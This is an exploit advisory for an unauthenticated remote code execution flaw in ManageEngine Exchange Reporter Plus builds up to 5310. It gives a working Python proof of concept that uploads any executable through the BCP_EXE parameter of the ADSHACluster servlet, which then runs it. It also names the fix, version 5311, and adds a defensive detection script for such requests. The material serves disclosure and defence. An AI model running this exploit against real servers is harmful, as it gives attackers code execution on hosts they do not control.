# Exploit Title: ManageEngine Exchange Reporter Plus <= 5310 Unauthenticated RCE
# Date: 28-06-2018
# Software Link: https://www.manageengine.com/products/exchange-reports/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# YouTube: https://www.youtube.com/c/KacperSzurek
# Category: remote

1. Description

The Java servlet `ADSHACluster` executes a `bcp.exe` file, which can be passed using the `BCP_EXE` param.

https://security.szurek.pl/manage-engine-exchange-reporter-plus-unauthenticated-rce.html

2. Proof of Concept

```python
# Python 2 (print statements, urllib.urlencode)
import urllib

file_to_execute = "calc.exe"
ip = "192.168.1.105"

def to_hex(s):
    lst = []
    for ch in s:
        hv = hex(ord(ch)).replace('0x', '')
        if len(hv) == 1:
            hv = '0'+hv
        lst.append(hv)

    return reduce(lambda x,y:x+y, lst)

print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"

params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
    print "OK"
else:
    print "ERROR"
```

3. Solution:

Update to version 5311

https://www.manageengine.com/products/exchange-reports/release-notes.html
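
For hosts that cannot be updated immediately, the request shape described above can be matched in recorded HTTP traffic. The following Python 3 detection sketch is an added example, not part of the original advisory or of the vendor's code. It assumes a reverse proxy, WAF or packet capture that records request bodies; the function names and the sample requests are constructed for illustration.

```python
import binascii
from urllib.parse import parse_qs, urlsplit

SERVLET_PATH = "/exchange/servlet/adshacluster"  # path from the advisory, lowercased

def inspect_request(method, target, body=""):
    """Return a finding for requests that pass BCP_EXE to ADSHACluster, else None."""
    parts = urlsplit(target)
    # Detection is deliberately lenient about case and a trailing slash.
    if parts.path.rstrip("/").lower() != SERVLET_PATH:
        return None
    # The parameter can arrive in the query string or in a form-encoded body.
    params = {}
    for source in (parts.query, body):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            params.setdefault(name.upper(), []).extend(values)
    if "BCP_EXE" not in params:
        return None
    value = params["BCP_EXE"][0]
    finding = {"method": method, "mtcall": params.get("MTCALL", [""])[0],
               "hex_chars": len(value), "valid_hex": False, "pe_header": False}
    try:
        raw = binascii.unhexlify(value)
    except ValueError:  # binascii.Error is a ValueError subclass
        return finding  # not decodable, but still reported for review
    finding["valid_hex"] = True
    finding["pe_header"] = raw[:2] == b"MZ"  # Windows executable magic bytes
    return finding

# Constructed sample requests: (method, request target, form-encoded body)
SAMPLES = [
    ("GET", "/exchange/index.html", ""),
    ("POST", "/exchange/servlet/ADSHACluster", "MTCALL=nativeClient&BCP_RLL=0102"),
    ("POST", "/exchange/servlet/ADSHACluster",
     "MTCALL=nativeClient&BCP_RLL=0102&BCP_EXE=4d5a9000"),
    ("POST", "/exchange/servlet/ADSHACluster", "BCP_EXE=zz"),
]

def scan(samples):
    """Run inspect_request over every sample and keep only the findings."""
    return [f for f in (inspect_request(*s) for s in samples) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

A finding with `pe_header` set to true means the parameter decoded to data starting with the Windows executable signature, which is the case to escalate first.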